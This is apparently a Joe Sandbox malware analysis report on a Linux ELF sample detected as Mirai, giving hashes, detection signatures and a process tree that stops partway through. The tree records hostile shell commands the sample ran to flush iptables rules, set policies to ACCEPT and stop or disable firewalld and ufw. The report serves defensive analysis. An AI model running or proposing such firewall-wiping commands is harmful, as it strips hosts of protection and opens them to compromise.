Edit tour

Linux Analysis Report
4lXTg8P7Ih.elf

Overview

General Information

Sample name:	4lXTg8P7Ih.elf renamed because original name is a hash value
Original sample name:	8891c104e3c4a985fd72c0604ae7626b.elf
Analysis ID:	1410699
MD5:	8891c104e3c4a985fd72c0604ae7626b
SHA1:	860ee5229ea8b4b1fe3a0fe2c739b6389d199520
SHA256:	3c0623888b007187d26b30dc40e8b0a862864a2ee87c47b648353c356c9802b0
Tags:	32elfgafgytrenesas
Infos:

Detection

Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mirai

Deletes all firewall rules

Executes the "iptables" command to insert, remove and/or manipulate rules

Sample tries to persist itself using System V runlevels

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "iptables" command used for managing IP filtering and manipulation

Executes the "modprobe" command used for loading kernel modules

Executes the "systemctl" command used for controlling the systemd system and service manager

HTTP GET or POST without a user agent

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1410699
Start date and time:	2024-03-18 09:55:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	4lXTg8P7Ih.elf renamed because original name is a hash value
Original Sample Name:	8891c104e3c4a985fd72c0604ae7626b.elf
Detection:	MAL
Classification:	mal100.troj.linELF@0/3@1/0

Warnings

HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:	/tmp/4lXTg8P7Ih.elf
PID:	6225
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	CNfeiJiangP0werful
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

4lXTg8P7Ih.elf (PID: 6225, Parent: 6143, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/4lXTg8P7Ih.elf

4lXTg8P7Ih.elf New Fork (PID: 6227, Parent: 6225)

sh (PID: 6227, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -F >/dev/null 2>&1"

sh New Fork (PID: 6231, Parent: 6227)

iptables (PID: 6231, Parent: 6227, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F

4lXTg8P7Ih.elf New Fork (PID: 6236, Parent: 6225)

sh (PID: 6236, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -X >/dev/null 2>&1"

sh New Fork (PID: 6238, Parent: 6236)

iptables (PID: 6238, Parent: 6236, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X

4lXTg8P7Ih.elf New Fork (PID: 6239, Parent: 6225)

sh (PID: 6239, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -t nat -F >/dev/null 2>&1"

sh New Fork (PID: 6241, Parent: 6239)

iptables (PID: 6241, Parent: 6239, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -t nat -F

4lXTg8P7Ih.elf New Fork (PID: 6244, Parent: 6225)

sh (PID: 6244, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -t nat -X >/dev/null 2>&1"

sh New Fork (PID: 6246, Parent: 6244)

iptables (PID: 6246, Parent: 6244, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -t nat -X

4lXTg8P7Ih.elf New Fork (PID: 6247, Parent: 6225)

sh (PID: 6247, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -t mangle -F >/dev/null 2>&1"

sh New Fork (PID: 6249, Parent: 6247)

iptables (PID: 6249, Parent: 6247, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -t mangle -F

4lXTg8P7Ih.elf New Fork (PID: 6251, Parent: 6225)

sh (PID: 6251, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -t mangle -X >/dev/null 2>&1"

sh New Fork (PID: 6253, Parent: 6251)

iptables (PID: 6253, Parent: 6251, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -t mangle -X

4lXTg8P7Ih.elf New Fork (PID: 6254, Parent: 6225)

sh (PID: 6254, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -P INPUT ACCEPT >/dev/null 2>&1"

sh New Fork (PID: 6256, Parent: 6254)

iptables (PID: 6256, Parent: 6254, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P INPUT ACCEPT

4lXTg8P7Ih.elf New Fork (PID: 6257, Parent: 6225)

sh (PID: 6257, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -P FORWARD ACCEPT >/dev/null 2>&1"

sh New Fork (PID: 6259, Parent: 6257)

iptables (PID: 6259, Parent: 6257, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P FORWARD ACCEPT

4lXTg8P7Ih.elf New Fork (PID: 6260, Parent: 6225)

sh (PID: 6260, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "service iptables save >/dev/null 2>&1"

sh New Fork (PID: 6262, Parent: 6260)

service (PID: 6262, Parent: 6260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service iptables save

service New Fork (PID: 6263, Parent: 6262)

basename (PID: 6263, Parent: 6262, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 6264, Parent: 6262)

basename (PID: 6264, Parent: 6262, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 6266, Parent: 6262)

systemctl (PID: 6266, Parent: 6262, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

4lXTg8P7Ih.elf New Fork (PID: 6267, Parent: 6225)

sh (PID: 6267, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl stop firewalld >/dev/null 2>&1"

sh New Fork (PID: 6269, Parent: 6267)

systemctl (PID: 6269, Parent: 6267, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop firewalld

4lXTg8P7Ih.elf New Fork (PID: 6270, Parent: 6225)

sh (PID: 6270, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl disable firewalld >/dev/null 2>&1"

sh New Fork (PID: 6272, Parent: 6270)

systemctl (PID: 6272, Parent: 6270, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl disable firewalld

4lXTg8P7Ih.elf New Fork (PID: 6273, Parent: 6225)

sh (PID: 6273, Parent: 6225, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ufw disable >/dev/null 2>&1"

sh New Fork (PID: 6275, Parent: 6273)

ufw (PID: 6275, Parent: 6273, MD5: 69f442c3e33b5f9a66b722c29ad89435) Arguments: ufw disable

ufw New Fork (PID: 6276, Parent: 6275)

iptables (PID: 6276, Parent: 6275, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /usr/sbin/iptables -V

ufw New Fork (PID: 6277, Parent: 6275)

ufw-init (PID: 6277, Parent: 6275, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /lib/ufw/ufw-init force-stop

ufw-init New Fork (PID: 6278, Parent: 6277)

ip6tables (PID: 6278, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -L INPUT -n

ip6tables New Fork (PID: 6279, Parent: 6278)

modprobe (PID: 6279, Parent: 6278, MD5: 0b44462b1a40df8039d6d61cfff7ea84) Arguments: /sbin/modprobe ip6_tables

ufw-init New Fork (PID: 6281, Parent: 6277)

iptables (PID: 6281, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-logging-deny

ufw-init New Fork (PID: 6282, Parent: 6277)

iptables (PID: 6282, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-logging-allow

ufw-init New Fork (PID: 6283, Parent: 6277)

iptables (PID: 6283, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-not-local

ufw-init New Fork (PID: 6284, Parent: 6277)

iptables (PID: 6284, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-logging-input

ufw-init New Fork (PID: 6285, Parent: 6277)

iptables (PID: 6285, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-limit-accept

ufw-init New Fork (PID: 6286, Parent: 6277)

iptables (PID: 6286, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-limit

ufw-init New Fork (PID: 6287, Parent: 6277)

iptables (PID: 6287, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-skip-to-policy-input

ufw-init New Fork (PID: 6288, Parent: 6277)

iptables (PID: 6288, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-reject-input

ufw-init New Fork (PID: 6289, Parent: 6277)

iptables (PID: 6289, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-logging-input

ufw-init New Fork (PID: 6290, Parent: 6277)

iptables (PID: 6290, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-input

ufw-init New Fork (PID: 6291, Parent: 6277)

iptables (PID: 6291, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-input

ufw-init New Fork (PID: 6292, Parent: 6277)

iptables (PID: 6292, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-input

ufw-init New Fork (PID: 6293, Parent: 6277)

iptables (PID: 6293, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-logging-input

ufw-init New Fork (PID: 6294, Parent: 6277)

iptables (PID: 6294, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-skip-to-policy-forward

ufw-init New Fork (PID: 6295, Parent: 6277)

iptables (PID: 6295, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-reject-forward

ufw-init New Fork (PID: 6296, Parent: 6277)

iptables (PID: 6296, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-logging-forward

ufw-init New Fork (PID: 6297, Parent: 6277)

iptables (PID: 6297, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-forward

ufw-init New Fork (PID: 6298, Parent: 6277)

iptables (PID: 6298, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-logging-forward

ufw-init New Fork (PID: 6299, Parent: 6277)

iptables (PID: 6299, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-forward

ufw-init New Fork (PID: 6300, Parent: 6277)

iptables (PID: 6300, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-forward

ufw-init New Fork (PID: 6301, Parent: 6277)

iptables (PID: 6301, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-logging-forward

ufw-init New Fork (PID: 6302, Parent: 6277)

iptables (PID: 6302, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-track-forward

ufw-init New Fork (PID: 6303, Parent: 6277)

iptables (PID: 6303, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-track-output

ufw-init New Fork (PID: 6304, Parent: 6277)

iptables (PID: 6304, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-track-input

ufw-init New Fork (PID: 6305, Parent: 6277)

iptables (PID: 6305, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-skip-to-policy-output

ufw-init New Fork (PID: 6306, Parent: 6277)

iptables (PID: 6306, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-reject-output

ufw-init New Fork (PID: 6307, Parent: 6277)

iptables (PID: 6307, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-logging-output

ufw-init New Fork (PID: 6308, Parent: 6277)

iptables (PID: 6308, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-after-output

ufw-init New Fork (PID: 6309, Parent: 6277)

iptables (PID: 6309, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-logging-output

ufw-init New Fork (PID: 6310, Parent: 6277)

iptables (PID: 6310, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-user-output

ufw-init New Fork (PID: 6311, Parent: 6277)

iptables (PID: 6311, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-output

ufw-init New Fork (PID: 6312, Parent: 6277)

iptables (PID: 6312, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F ufw-before-logging-output

ufw-init New Fork (PID: 6313, Parent: 6277)

iptables (PID: 6313, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-logging-deny

ufw-init New Fork (PID: 6314, Parent: 6277)

iptables (PID: 6314, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-logging-allow

ufw-init New Fork (PID: 6315, Parent: 6277)

iptables (PID: 6315, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-not-local

ufw-init New Fork (PID: 6316, Parent: 6277)

iptables (PID: 6316, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-logging-input

ufw-init New Fork (PID: 6317, Parent: 6277)

iptables (PID: 6317, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-limit-accept

ufw-init New Fork (PID: 6318, Parent: 6277)

iptables (PID: 6318, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-limit

ufw-init New Fork (PID: 6319, Parent: 6277)

iptables (PID: 6319, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-skip-to-policy-input

ufw-init New Fork (PID: 6320, Parent: 6277)

iptables (PID: 6320, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-reject-input

ufw-init New Fork (PID: 6321, Parent: 6277)

iptables (PID: 6321, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-logging-input

ufw-init New Fork (PID: 6322, Parent: 6277)

iptables (PID: 6322, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-input

ufw-init New Fork (PID: 6323, Parent: 6277)

iptables (PID: 6323, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-input

ufw-init New Fork (PID: 6324, Parent: 6277)

iptables (PID: 6324, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-input

ufw-init New Fork (PID: 6325, Parent: 6277)

iptables (PID: 6325, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-logging-input

ufw-init New Fork (PID: 6326, Parent: 6277)

iptables (PID: 6326, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-skip-to-policy-forward

ufw-init New Fork (PID: 6327, Parent: 6277)

iptables (PID: 6327, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-reject-forward

ufw-init New Fork (PID: 6328, Parent: 6277)

iptables (PID: 6328, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-logging-forward

ufw-init New Fork (PID: 6329, Parent: 6277)

iptables (PID: 6329, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-forward

ufw-init New Fork (PID: 6330, Parent: 6277)

iptables (PID: 6330, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-logging-forward

ufw-init New Fork (PID: 6331, Parent: 6277)

iptables (PID: 6331, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-forward

ufw-init New Fork (PID: 6332, Parent: 6277)

iptables (PID: 6332, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-forward

ufw-init New Fork (PID: 6333, Parent: 6277)

iptables (PID: 6333, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-logging-forward

ufw-init New Fork (PID: 6334, Parent: 6277)

iptables (PID: 6334, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-track-forward

ufw-init New Fork (PID: 6335, Parent: 6277)

iptables (PID: 6335, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-track-output

ufw-init New Fork (PID: 6336, Parent: 6277)

iptables (PID: 6336, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-track-input

ufw-init New Fork (PID: 6337, Parent: 6277)

iptables (PID: 6337, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-skip-to-policy-output

ufw-init New Fork (PID: 6338, Parent: 6277)

iptables (PID: 6338, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-reject-output

ufw-init New Fork (PID: 6339, Parent: 6277)

iptables (PID: 6339, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-logging-output

ufw-init New Fork (PID: 6340, Parent: 6277)

iptables (PID: 6340, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-after-output

ufw-init New Fork (PID: 6341, Parent: 6277)

iptables (PID: 6341, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-logging-output

ufw-init New Fork (PID: 6342, Parent: 6277)

iptables (PID: 6342, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-user-output

ufw-init New Fork (PID: 6343, Parent: 6277)

iptables (PID: 6343, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-output

ufw-init New Fork (PID: 6344, Parent: 6277)

iptables (PID: 6344, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -Z ufw-before-logging-output

ufw-init New Fork (PID: 6345, Parent: 6277)

iptables (PID: 6345, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-logging-deny

ufw-init New Fork (PID: 6346, Parent: 6277)

iptables (PID: 6346, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-logging-allow

ufw-init New Fork (PID: 6347, Parent: 6277)

iptables (PID: 6347, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-not-local

ufw-init New Fork (PID: 6348, Parent: 6277)

iptables (PID: 6348, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-logging-input

ufw-init New Fork (PID: 6349, Parent: 6277)

iptables (PID: 6349, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-logging-output

ufw-init New Fork (PID: 6350, Parent: 6277)

iptables (PID: 6350, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-logging-forward

ufw-init New Fork (PID: 6351, Parent: 6277)

iptables (PID: 6351, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-limit-accept

ufw-init New Fork (PID: 6352, Parent: 6277)

iptables (PID: 6352, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-limit

ufw-init New Fork (PID: 6353, Parent: 6277)

iptables (PID: 6353, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-input

ufw-init New Fork (PID: 6354, Parent: 6277)

iptables (PID: 6354, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-forward

ufw-init New Fork (PID: 6355, Parent: 6277)

iptables (PID: 6355, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-user-output

ufw-init New Fork (PID: 6356, Parent: 6277)

iptables (PID: 6356, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-skip-to-policy-input

ufw-init New Fork (PID: 6357, Parent: 6277)

iptables (PID: 6357, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-skip-to-policy-output

ufw-init New Fork (PID: 6358, Parent: 6277)

iptables (PID: 6358, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -X ufw-skip-to-policy-forward

ufw-init New Fork (PID: 6359, Parent: 6277)

iptables (PID: 6359, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P INPUT ACCEPT

ufw-init New Fork (PID: 6360, Parent: 6277)

iptables (PID: 6360, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P OUTPUT ACCEPT

ufw-init New Fork (PID: 6361, Parent: 6277)

iptables (PID: 6361, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -P FORWARD ACCEPT

ufw-init New Fork (PID: 6362, Parent: 6277)

ip6tables (PID: 6362, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-logging-deny

ufw-init New Fork (PID: 6364, Parent: 6277)

ip6tables (PID: 6364, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-logging-allow

ufw-init New Fork (PID: 6365, Parent: 6277)

ip6tables (PID: 6365, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-not-local

ufw-init New Fork (PID: 6366, Parent: 6277)

ip6tables (PID: 6366, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-logging-input

ufw-init New Fork (PID: 6367, Parent: 6277)

ip6tables (PID: 6367, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-limit-accept

ufw-init New Fork (PID: 6368, Parent: 6277)

ip6tables (PID: 6368, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-limit

ufw-init New Fork (PID: 6369, Parent: 6277)

ip6tables (PID: 6369, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-skip-to-policy-input

ufw-init New Fork (PID: 6370, Parent: 6277)

ip6tables (PID: 6370, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-reject-input

ufw-init New Fork (PID: 6371, Parent: 6277)

ip6tables (PID: 6371, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-logging-input

ufw-init New Fork (PID: 6372, Parent: 6277)

ip6tables (PID: 6372, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-input

ufw-init New Fork (PID: 6373, Parent: 6277)

ip6tables (PID: 6373, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-input

ufw-init New Fork (PID: 6374, Parent: 6277)

ip6tables (PID: 6374, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-input

ufw-init New Fork (PID: 6375, Parent: 6277)

ip6tables (PID: 6375, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-logging-input

ufw-init New Fork (PID: 6376, Parent: 6277)

ip6tables (PID: 6376, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-skip-to-policy-forward

ufw-init New Fork (PID: 6377, Parent: 6277)

ip6tables (PID: 6377, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-reject-forward

ufw-init New Fork (PID: 6378, Parent: 6277)

ip6tables (PID: 6378, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-logging-forward

ufw-init New Fork (PID: 6379, Parent: 6277)

ip6tables (PID: 6379, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-forward

ufw-init New Fork (PID: 6380, Parent: 6277)

ip6tables (PID: 6380, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-logging-forward

ufw-init New Fork (PID: 6381, Parent: 6277)

ip6tables (PID: 6381, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-forward

ufw-init New Fork (PID: 6382, Parent: 6277)

ip6tables (PID: 6382, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-forward

ufw-init New Fork (PID: 6383, Parent: 6277)

ip6tables (PID: 6383, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-logging-forward

ufw-init New Fork (PID: 6384, Parent: 6277)

ip6tables (PID: 6384, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-track-forward

ufw-init New Fork (PID: 6385, Parent: 6277)

ip6tables (PID: 6385, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-track-output

ufw-init New Fork (PID: 6386, Parent: 6277)

ip6tables (PID: 6386, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-track-input

ufw-init New Fork (PID: 6387, Parent: 6277)

ip6tables (PID: 6387, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-skip-to-policy-output

ufw-init New Fork (PID: 6388, Parent: 6277)

ip6tables (PID: 6388, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-reject-output

ufw-init New Fork (PID: 6389, Parent: 6277)

ip6tables (PID: 6389, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-logging-output

ufw-init New Fork (PID: 6390, Parent: 6277)

ip6tables (PID: 6390, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-after-output

ufw-init New Fork (PID: 6391, Parent: 6277)

ip6tables (PID: 6391, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-logging-output

ufw-init New Fork (PID: 6392, Parent: 6277)

ip6tables (PID: 6392, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-user-output

ufw-init New Fork (PID: 6393, Parent: 6277)

ip6tables (PID: 6393, Parent: 6277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -F ufw6-before-output

ufw-init New Fork (PID: 6394, Parent: 6277)

